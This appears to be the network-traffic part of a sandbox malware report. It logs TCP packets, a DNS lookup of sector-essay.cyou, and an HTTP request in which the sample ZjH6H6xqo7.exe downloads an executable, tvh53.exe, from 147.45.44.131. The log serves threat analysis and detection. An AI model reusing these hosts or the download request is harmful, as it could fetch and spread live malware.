                        Nov 24, 2024 08:35:36.175029039 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.175061941 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.175136089 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.178183079 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.178194046 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.178260088 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.181066990 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.181173086 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.181242943 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.183978081 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.184112072 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.184175968 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.186968088 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.187028885 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.187114000 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.189944983 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.190078020 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.190129995 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.192956924 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.193001986 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.193084955 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.195995092 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.196108103 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.196186066 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.198956013 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.199018002 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.199150085 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.202114105 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.202224016 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.202290058 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.204931974 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.204967022 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.205044031 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.207920074 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.208043098 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.208218098 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.210973978 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.211041927 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.211102962 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.213887930 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.213990927 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.214070082 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.216897964 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.216969013 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.217077971 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.219860077 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.219963074 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.220036983 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.222871065 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.223006010 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.223078966 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.225908041 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.225986958 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.226074934 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.228849888 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.228971004 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.229079008 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.231842041 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.231966019 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.232091904 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.234823942 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.234915018 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.235002041 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.278712034 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.278793097 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.278866053 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.279870987 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.280042887 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.280111074 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.282721043 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.282804966 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.282893896 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.284706116 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.284893036 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.285001993 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.287081957 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.287201881 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.287273884 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.289532900 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.289701939 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.289830923 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.291870117 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.292139053 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.292207003 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.293926001 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.294158936 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.294224977 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.296112061 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.296164989 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.296251059 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.298338890 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.298449039 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.298516035 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.300539017 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.300565004 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.300638914 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.302582026 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.302694082 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.302789927 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.304672003 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.304704905 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.304816961 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.306729078 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.306878090 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.306957960 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.308777094 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.308914900 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.308994055 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.310800076 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.310911894 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.310970068 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.312850952 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.312911987 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.312964916 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.315002918 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.315088034 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.315175056 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.316736937 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.316824913 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.316936970 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.318667889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.318778992 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.318840981 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.320617914 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.320728064 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.320784092 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.322499990 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.371038914 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.941148043 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:37.335572004 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:37.335638046 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:37.335817099 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:37.337500095 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:37.337524891 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.621197939 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.621321917 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.624461889 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.624476910 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.624780893 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.667902946 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.726686954 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.726711988 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.726885080 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.319413900 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.319519997 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.319581985 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.321774006 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.321794987 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.321825027 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.321831942 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.478362083 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.478419065 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.478494883 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.479070902 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.479084969 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:40.735776901 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:40.735887051 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:40.737098932 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:40.737104893 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:40.737351894 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:40.738504887 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:40.738528013 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:40.738578081 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.446508884 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.446561098 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.446592093 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.446636915 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.446666956 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.446669102 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.446693897 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.446710110 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.446749926 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.446753979 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.453954935 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.454032898 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.454056025 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.462239981 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.462311983 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.462328911 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.511814117 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.511854887 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.558650017 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.646991968 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.650772095 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.650897980 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.651012897 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.651014090 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.651096106 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.651114941 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.651130915 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.651135921 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.679567099 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.679626942 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:41.679836988 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.680099010 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:41.680115938 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:42.937397957 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:42.937474966 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:42.941329956 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:42.941345930 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:42.941582918 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:42.943396091 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:42.943532944 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:42.943561077 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:43.712161064 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:43.712253094 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:43.712497950 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:43.712636948 CET49707443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:43.712660074 CET44349707104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:43.734525919 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:43.734579086 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:43.734649897 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:43.734941959 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:43.734955072 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:44.950825930 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:44.950948000 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:44.952591896 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:44.952608109 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:44.952853918 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:44.954399109 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:44.954554081 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:44.954582930 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:44.954669952 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:44.954678059 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:45.699394941 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:45.699497938 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:45.699661970 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:45.699717045 CET49708443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:45.699728012 CET44349708104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:45.788099051 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:45.788144112 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:45.788233042 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:45.788530111 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:45.788539886 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.056437016 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.056521893 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:47.057693958 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:47.057704926 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.057938099 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.060369968 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:47.060503006 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:47.060533047 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.060600042 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:47.060609102 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.950278044 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.950393915 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:47.950455904 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:47.950557947 CET49709443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:47.950577021 CET44349709104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:48.063488960 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:48.063530922 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:48.063606024 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:48.063896894 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:48.063905954 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:49.322613955 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:49.322834015 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:49.324028015 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:49.324039936 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:49.324276924 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:49.325536013 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:49.325622082 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:49.325628042 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:50.066952944 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:50.067264080 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:50.067446947 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:50.084422112 CET49710443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:50.084445000 CET44349710104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:50.695514917 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:50.695643902 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:50.695741892 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:50.696089983 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:50.696125984 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.956306934 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.956377029 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.957668066 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.957686901 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.958040953 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.959358931 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.960248947 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.960294008 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.960468054 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.960505962 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.960606098 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.960656881 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.960784912 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.960813999 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.961018085 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.961042881 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.961198092 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.961230040 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.961276054 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.961457968 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.961487055 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:51.961515903 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.961827040 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:51.961858034 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:52.007327080 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:52.007540941 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:52.007596970 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:52.007647038 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:52.055330992 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:52.055485964 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:52.099363089 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:52.321885109 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:54.302756071 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:54.302999020 CET44349711104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:54.303029060 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:54.303103924 CET49711443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:54.307183981 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:54.307226896 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:54.307344913 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:54.307634115 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:54.307651043 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:55.573949099 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:55.574110985 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:55.575793028 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:55.575812101 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:55.576136112 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:55.580684900 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:55.580701113 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:55.580761909 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:56.299158096 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:56.299418926 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:56.299480915 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:56.299633980 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:56.299653053 CET44349722104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:56.299678087 CET49722443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:56.299683094 CET44349722104.21.47.136192.168.2.5

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 24, 2024 08:35:36.997805119 CET6174653192.168.2.51.1.1.1
                        Nov 24, 2024 08:35:37.328691006 CET53617461.1.1.1192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Nov 24, 2024 08:35:36.997805119 CET192.168.2.51.1.1.10x9fb4Standard query (0)sector-essay.cyouA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Nov 24, 2024 08:35:37.328691006 CET1.1.1.1192.168.2.50x9fb4No error (0)sector-essay.cyou104.21.47.136A (IP address)IN (0x0001)false
                        Nov 24, 2024 08:35:37.328691006 CET1.1.1.1192.168.2.50x9fb4No error (0)sector-essay.cyou172.67.148.12A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • sector-essay.cyou
                        • 147.45.44.131

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704147.45.44.131805452C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        TimestampBytes transferredDirectionData
                        Nov 24, 2024 08:35:34.052654982 CET181OUTGET /infopage/tvh53.exe HTTP/1.1
                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                        Host: 147.45.44.131
                        Connection: Keep-Alive
                        Nov 24, 2024 08:35:35.318037033 CET1236INHTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:35 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Last-Modified: Sat, 16 Nov 2024 15:59:10 GMT
                        ETag: "4ce00-62709c39a70e3"
                        Accept-Ranges: bytes
                        Content-Length: 314880
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdos-program
